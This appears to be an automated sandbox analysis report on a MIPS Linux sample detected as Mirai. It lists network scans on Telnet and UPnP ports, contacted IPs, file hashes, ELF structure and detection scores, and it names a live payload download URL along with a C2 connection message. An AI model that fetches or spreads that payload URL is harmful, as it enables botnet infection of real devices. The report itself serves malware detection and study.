Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35260 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47000 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43682 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58372 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51914 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47184 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57018 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33162 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43878 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41662 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37720 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48126 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33232 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33232 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36076 -> 52869

Source: /tmp/fbXTgwatuJ (PID: 5221)

Queries kernel information via 'uname':

Source: fbXTgwatuJ, 5221.1.0000000078b81479.0000000054b104ce.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: fbXTgwatuJ, 5221.1.0000000068a2555c.00000000fdd51821.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/fbXTgwatuJSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/fbXTgwatuJ
Source: fbXTgwatuJ, 5221.1.0000000078b81479.0000000054b104ce.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: fbXTgwatuJ, 5221.1.0000000068a2555c.00000000fdd51821.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping1	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fbXTgwatuJ	59%	Virustotal		Browse
fbXTgwatuJ	51%	Metadefender		Browse
fbXTgwatuJ	71%	ReversingLabs	Linux.Trojan.Mirai

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:52869/picdesc.xml	0%	Virustotal		Browse
http://127.0.0.1:52869/picdesc.xml	0%	Avira URL Cloud	safe
http://127.0.0.1:52869/wanipcn.xml	0%	Virustotal		Browse
http://127.0.0.1:52869/wanipcn.xml	0%	Avira URL Cloud	safe
http://103.3.246.123/bins/Hilix.mips	14%	Virustotal		Browse
http://103.3.246.123/bins/Hilix.mips	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:52869/picdesc.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://127.0.0.1:52869/wanipcn.xml	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding/	fbXTgwatuJ, 5221.1.000000001115a6da.000000009fcb9cee.r-x.sdmp	false		high
http://103.3.246.123/bins/Hilix.mips	fbXTgwatuJ, 5221.1.000000001115a6da.000000009fcb9cee.r-x.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	fbXTgwatuJ, 5221.1.000000001115a6da.000000009fcb9cee.r-x.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.222.232.192	unknown	Ghana	37282	MAINONENG	false
43.148.246.116	unknown	Japan	4249	LILLY-ASUS	false
13.225.123.90	unknown	United States	16509	AMAZON-02US	false
123.81.9.213	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
185.252.217.161	unknown	Germany	12460	MANDALA-ASDE	false
197.166.142.70	unknown	Egypt	24863	LINKdotNET-ASEG	false
185.106.143.21	unknown	Serbia	7979	SERVERS-COMUS	false
197.49.247.206	unknown	Egypt	8452	TE-ASTE-ASEG	false
129.45.93.101	unknown	Algeria	327931	Optimum-Telecom-AlgeriaDZ	false
185.176.0.86	unknown	Ireland	47720	CIX-ASIE	false
136.151.234.158	unknown	United States	1204	SUNYNET-ASN-ASUS	false
91.222.6.78	unknown	Serbia	51859	MNSHA-ASRS	false
185.24.218.206	unknown	Poland	59491	LIVENET-PL	false
67.165.175.121	unknown	United States	7922	COMCAST-7922US	false
41.163.216.170	unknown	South Africa	36937	Neotel-ASZA	false
53.12.120.130	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
2.198.34.2	unknown	Italy	16232	ASN-TIMServiceProviderIT	false
91.244.134.28	unknown	Ukraine	44798	PERVOMAYSK-ASUA	false
45.243.90.255	unknown	Egypt	24863	LINKdotNET-ASEG	false
44.78.196.125	unknown	United States	7377	UCSDUS	false
45.239.81.159	unknown	Brazil	268384	JCTELECOMBR	false
91.180.11.220	unknown	Belgium	5432	PROXIMUS-ISP-ASBE	false
41.203.40.70	unknown	South Africa	36968	ECN-AS1ZA	false
156.204.73.129	unknown	Egypt	8452	TE-ASTE-ASEG	false
45.96.114.31	unknown	Egypt	37069	MOBINILEG	false
159.214.148.103	unknown	United States	10953	PECOUS	false
145.117.49.194	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
185.78.207.83	unknown	United Kingdom	8426	CLARANET-ASClaraNETLTDGB	false
156.193.176.230	unknown	Egypt	8452	TE-ASTE-ASEG	false
91.19.4.104	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
12.32.255.219	unknown	United States	2386	INS-ASUS	false
91.214.40.193	unknown	Russian Federation	60684	BNEDV-NETRU	false
45.153.14.23	unknown	Russian Federation	208221	ORIONNET-BRKRU	false
45.111.113.76	unknown	Egypt	37069	MOBINILEG	false
197.224.41.156	unknown	Mauritius	23889	MauritiusTelecomMU	false
185.41.67.136	unknown	Norway	50272	AVURAVURNO	false
45.2.167.112	unknown	Canada	7311	FRONTIERCA	false
45.159.66.144	unknown	Italy	60917	TEDRATEDRABACKBONEES	false
185.134.76.10	unknown	Luxembourg	50754	C2DLU	false
44.190.185.40	unknown	United States	39702	SIT-ASDE	false
91.156.132.81	unknown	Finland	719	ELISA-ASHelsinkiFinlandEU	false
220.143.72.166	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	false
185.15.125.98	unknown	Denmark	208237	AS_NKKOMDK	false
91.209.253.76	unknown	Saudi Arabia	48701	CABASPS	false
185.199.219.198	unknown	Germany	41955	SERNETSerNetServiceNetworkGmbHGoettingenDE	false
197.116.147.40	unknown	Algeria	36947	ALGTEL-ASDZ	false
74.210.198.233	unknown	Canada	11290	CC-3272CA	false
41.148.201.194	unknown	South Africa	5713	SAIX-NETZA	false
91.125.23.8	unknown	United Kingdom	6871	PLUSNETUKInternetServiceProviderGB	false
45.190.8.43	unknown	unknown	269617	SolutionsTelecomProvedordeInternetLTDA-MEBR	false
91.0.244.23	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
197.120.220.102	unknown	Egypt	36992	ETISALAT-MISREG	false
45.25.228.40	unknown	United States	7018	ATT-INTERNET4US	false
45.102.218.5	unknown	Egypt	37069	MOBINILEG	false
156.143.35.216	unknown	United States	14319	FURMAN-2US	false
70.207.197.16	unknown	United States	22394	CELLCOUS	false
91.53.232.18	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
50.180.82.50	unknown	United States	7922	COMCAST-7922US	false
41.221.211.177	unknown	South Africa	3491	BTN-ASNUS	false
41.39.124.196	unknown	Egypt	8452	TE-ASTE-ASEG	false
185.124.0.180	unknown	United Kingdom	204085	NGSGB	false
91.254.252.147	unknown	Italy	1267	ASN-WINDTREIUNETEU	false
66.121.87.98	unknown	United States	7132	SBIS-ASUS	false
185.22.127.130	unknown	Czech Republic	33883	TRIONET-CZ-ASNIXCZ	false
45.234.55.170	unknown	Brazil	267360	UniacessoServicosdeComunicacaoMultimidiaBR	false
91.219.76.51	unknown	Netherlands	51571	PROTECHNICSNL	false
185.240.220.103	unknown	Czech Republic	204772	RSD-CZ	false
156.199.251.111	unknown	Egypt	8452	TE-ASTE-ASEG	false
45.96.114.49	unknown	Egypt	37069	MOBINILEG	false
45.223.169.231	unknown	United States	327849	ROCKETNETZA	false
45.252.226.223	unknown	China	132116	ANINETWORK-INAniNetworkPvtLtdIN	false
113.204.87.244	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
45.141.18.12	unknown	Netherlands	34562	PROIP-ASIncaseofproblemscontactnocproipnetNL	false
185.246.190.10	unknown	Romania	3164	ASTIMPRO	false
37.69.111.68	unknown	France	15557	LDCOMNETFR	false
40.111.155.130	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.0.208.216	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
91.248.153.194	unknown	Germany	9145	EWETELCloppenburgerStrasse310DE	false
23.129.169.180	unknown	Reserved	46723	RESNETUS	false
17.135.215.183	unknown	United States	714	APPLE-ENGINEERINGUS	false
59.215.60.179	unknown	China	2516	KDDIKDDICORPORATIONJP	false
91.81.32.134	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
45.187.4.117	unknown	unknown	269846	TVZAMORACAVE	false
91.244.56.37	unknown	Ukraine	25133	MCLAUT-ASUA	false
222.182.208.77	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
135.33.188.37	unknown	United States	54614	CIKTELECOM-CABLECA	false
185.231.215.252	unknown	Germany	204965	MED360GRADDE	false
91.223.43.9	unknown	Slovenia	199612	BISNODESI	false
111.16.37.200	unknown	China	24444	CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompany	false
156.99.130.87	unknown	United States	1998	STATE-OF-MNUS	false
45.224.65.234	unknown	Brazil	266916	MARCIOCARDOSOFAGUNDESMEBR	false
155.117.235.41	unknown	United States	11003	PANDGUS	false
91.106.162.52	unknown	Germany	198930	DE-VSM-ASNPeeringDE	false
91.169.219.34	unknown	France	12322	PROXADFR	false
128.10.87.105	unknown	United States	17	PURDUEUS	false
75.190.128.227	unknown	United States	11426	TWC-11426-CAROLINASUS	false
156.79.92.14	unknown	United States	11363	FUJITSU-USAUS	false
91.193.176.179	unknown	Russian Federation	16345	BEE-ASRussiaRU	false
185.184.141.169	unknown	United Kingdom	52423	DataMinersSARacknationcrCR	false
212.153.127.43	unknown	Netherlands	702	UUNETUS	false

Runtime Messages

Command:	/tmp/fbXTgwatuJ
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Connected To CNC
Standard Error:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
91.180.11.220	SCahhGpqlT	Get hash	malicious	Browse
91.222.6.78	UguI8hPCWh	Get hash	malicious	Browse
41.163.216.170	qKjg35J4FG	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MAINONENG	Zhh51946Eq	Get hash	malicious	Browse	45.222.232.178
	x86_64	Get hash	malicious	Browse	45.222.232.179
	LOF3X5rpI9	Get hash	malicious	Browse	154.113.68.238
	jew.x86	Get hash	malicious	Browse	197.253.55.177
	sora.x86	Get hash	malicious	Browse	45.222.248.93
	QUqBgpQj3B	Get hash	malicious	Browse	45.222.232.189
	8pAbCU5dKP	Get hash	malicious	Browse	154.113.177.204
	8kNgpvKpMy	Get hash	malicious	Browse	154.113.68.244
AMAZON-02US	27xJuvcfMM	Get hash	malicious	Browse	54.250.225.134
	E4438FE55AD506189992ED8BFA402449106E5C7D0AE3A.exe	Get hash	malicious	Browse	3.13.191.225
	rEOqCaa9fM.apk	Get hash	malicious	Browse	52.92.163.216
	Passcode_for_jsartori_451_6.html	Get hash	malicious	Browse	52.34.207.165
	DevInstallerBeta.exe	Get hash	malicious	Browse	104.192.141.1
	DevInstallerBeta.exe	Get hash	malicious	Browse	52.217.129.129
	Devoncs-Attachment 2021-11-09 File - 5849057.html	Get hash	malicious	Browse	13.32.219.88
	PO_AMO_8100045923.exe	Get hash	malicious	Browse	50.18.238.17
	zuroq8.dll	Get hash	malicious	Browse	205.251.242.103
	zuroq1.dll	Get hash	malicious	Browse	176.32.103.205
	BSDs-4933.PZTOJFSSIFHXAAYTSKOMYAGCHTHAOF#U00f1.msi	Get hash	malicious	Browse	13.249.13.93
	8557527948257.html	Get hash	malicious	Browse	13.249.13.23
	SOA & INV FOR OCT'21.exe	Get hash	malicious	Browse	3.64.163.50
	Order confirmation.exe	Get hash	malicious	Browse	54.176.36.242
	vbc.exe	Get hash	malicious	Browse	44.227.65.245
	Vergi #U00f6deme faturas#U0131 9 Kas#U0131m 2021 Sal#U0131,pdf.exe	Get hash	malicious	Browse	75.2.115.196
	MV OCEANLADY.docx	Get hash	malicious	Browse	76.223.86.4
	PO#SC83994.docx	Get hash	malicious	Browse	76.223.86.4
	PO_SC83994.docx	Get hash	malicious	Browse	13.248.219.100
	mips	Get hash	malicious	Browse	13.52.84.58
LILLY-ASUS	27xJuvcfMM	Get hash	malicious	Browse	43.51.1.174
	PO03112021STK#Approved#.exe	Get hash	malicious	Browse	43.128.51.206
	mips	Get hash	malicious	Browse	40.195.110.117
	x86_64	Get hash	malicious	Browse	42.214.198.198
	arm	Get hash	malicious	Browse	43.220.27.140
	arm5	Get hash	malicious	Browse	42.211.12.113
	Quote request.exe	Get hash	malicious	Browse	43.132.183.85
	GB0O1NUtmJ	Get hash	malicious	Browse	43.168.211.141
	4DrtSJOLjr	Get hash	malicious	Browse	40.22.172.35
	LAQh74RNEl	Get hash	malicious	Browse	40.15.158.75
	Kz2SeJpaxw	Get hash	malicious	Browse	43.61.74.28
	RrK5IgZ6gZ	Get hash	malicious	Browse	40.2.50.69
	BKyU0T5xcw	Get hash	malicious	Browse	43.115.211.129
	ZvUGMRqJrx	Get hash	malicious	Browse	40.53.145.123
	jyTZMJKPD2	Get hash	malicious	Browse	43.18.191.106
	P8NtIPe7f0	Get hash	malicious	Browse	40.41.25.83
	OoeA4dABtV	Get hash	malicious	Browse	43.73.22.170
	gFn4iz8ygL	Get hash	malicious	Browse	40.16.69.95
	b8xw7rKh8F	Get hash	malicious	Browse	43.10.117.153
	SQFoFeC1jQ	Get hash	malicious	Browse	43.146.166.26

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/proc/5274/oom_score_adj Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	6
Entropy (8bit):	1.7924812503605778
Encrypted:	false
SSDEEP:	3:ptn:Dn
MD5:	CBF282CC55ED0792C33D10003D1F760A
SHA1:	007DD8BD75468E6B7ABA4285E9B267202C7EAEED
SHA-256:	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
SHA-512:	4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
Malicious:	false
Reputation:	high, very likely benign file
Preview:	-1000.

/run/sshd.pid Download File
Process:	/usr/sbin/sshd
File Type:	ASCII text
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Civ:CM
MD5:	399A14B7B28E9470E1BE6F272272890A
SHA1:	5B82D7F69C166B978FBFC8009876BE4797BAAC8D
SHA-256:	7C92CC37DF60EBCCC15A4175839687DD0EC20BD8FA9A730DD1C193473D3A5860
SHA-512:	01619BEF8D2ADA8E3EBF14DB84500B3F0D1F8C19AB9FE963C74C39168DB2719E21B8AA033FFA1B6FCE28C07D54B4B098CB5FBB255908170484C683DD1752CBD9
Malicious:	false
Reputation:	low
Preview:	5274.

Static File Info

General
File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.519175023882212
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	fbXTgwatuJ
File size:	80052
MD5:	24f322c83a02e56c509deb0f9baf28b4
SHA1:	f60f06d2c600694d5b0446d7a9bc4d85ae25366b
SHA256:	bd1499d689ff1b6cd861b79f18c133709f6bcb118bb07956aa10848d3adac7d7
SHA512:	82694b09a1080aacc78dcd702eacd1d2e3e244df8a2ff1bb4455e65679b51f98489bd2341b32609bbe0dd342d90f86abf5cc2dd7a7e21312ef45d968a1ec6bee
SSDEEP:	1536:aqJw3YsMggETUfX9bBSsZjZbjZXxhaGAbH2D:aqJesZETUPBbjLD
File Content Preview:	.ELF....................`.@.4....6......4. ...(...............@...@.@-..@-...............0...0E..0E. ...`...........Q.td...............................<...'!......'.......................<...'!... .........9'.. ........................<x..'!.............9

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	79492
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x11a20	0x0	0x6	AX	16
.fini	PROGBITS	0x411b40	0x11b40	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x411ba0	0x11ba0	0x11a0	0x0	0x2	A	16
.ctors	PROGBITS	0x453000	0x13000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x453008	0x13008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x453014	0x13014	0x4	0x0	0x3	WA	4
.data	PROGBITS	0x453020	0x13020	0x250	0x0	0x3	WA	16
.got	PROGBITS	0x453270	0x13270	0x3b0	0x4	0x10000003	WA	16
.sbss	NOBITS	0x453620	0x13620	0x24	0x0	0x10000003	WA	4
.bss	NOBITS	0x453650	0x13620	0x310	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x6d2	0x13620	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x13620	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x12d40	0x12d40	3.5572	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x13000	0x453000	0x453000	0x620	0x960	2.4507	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 10, 2021 02:55:05.704876900 CET	3667	23	192.168.2.23	35.255.26.186
Nov 10, 2021 02:55:05.705002069 CET	3667	23	192.168.2.23	168.199.34.186
Nov 10, 2021 02:55:05.705032110 CET	3667	23	192.168.2.23	18.80.153.85
Nov 10, 2021 02:55:05.705081940 CET	3667	23	192.168.2.23	179.15.44.133
Nov 10, 2021 02:55:05.705091000 CET	3667	23	192.168.2.23	86.79.126.77
Nov 10, 2021 02:55:05.705105066 CET	3667	23	192.168.2.23	136.90.151.190
Nov 10, 2021 02:55:05.705105066 CET	3667	23	192.168.2.23	24.118.248.148
Nov 10, 2021 02:55:05.705137968 CET	3667	23	192.168.2.23	39.184.248.113
Nov 10, 2021 02:55:05.705151081 CET	3667	23	192.168.2.23	67.152.42.8
Nov 10, 2021 02:55:05.705204964 CET	3667	23	192.168.2.23	75.201.207.191
Nov 10, 2021 02:55:05.705240965 CET	3667	23	192.168.2.23	209.87.52.55
Nov 10, 2021 02:55:05.705266953 CET	3667	23	192.168.2.23	201.112.101.153
Nov 10, 2021 02:55:05.705274105 CET	3667	23	192.168.2.23	129.8.111.214
Nov 10, 2021 02:55:05.705279112 CET	3667	23	192.168.2.23	164.114.139.102
Nov 10, 2021 02:55:05.705291986 CET	3667	23	192.168.2.23	205.34.208.205
Nov 10, 2021 02:55:05.705293894 CET	3667	23	192.168.2.23	150.189.6.241
Nov 10, 2021 02:55:05.705315113 CET	3667	23	192.168.2.23	93.136.219.105
Nov 10, 2021 02:55:05.705321074 CET	3667	23	192.168.2.23	165.3.150.82
Nov 10, 2021 02:55:05.705346107 CET	3667	23	192.168.2.23	65.240.9.142
Nov 10, 2021 02:55:05.705424070 CET	3667	23	192.168.2.23	115.19.209.74
Nov 10, 2021 02:55:05.705440044 CET	3667	23	192.168.2.23	194.84.5.211
Nov 10, 2021 02:55:05.705446959 CET	3667	23	192.168.2.23	197.193.139.127
Nov 10, 2021 02:55:05.705447912 CET	3667	23	192.168.2.23	164.71.254.65
Nov 10, 2021 02:55:05.705478907 CET	3667	23	192.168.2.23	79.85.236.197
Nov 10, 2021 02:55:05.705506086 CET	3667	23	192.168.2.23	72.149.63.233
Nov 10, 2021 02:55:05.705521107 CET	3667	23	192.168.2.23	107.45.243.102
Nov 10, 2021 02:55:05.705524921 CET	3667	23	192.168.2.23	94.146.197.101
Nov 10, 2021 02:55:05.705540895 CET	3667	23	192.168.2.23	181.44.79.28
Nov 10, 2021 02:55:05.705559969 CET	3667	23	192.168.2.23	146.95.195.189
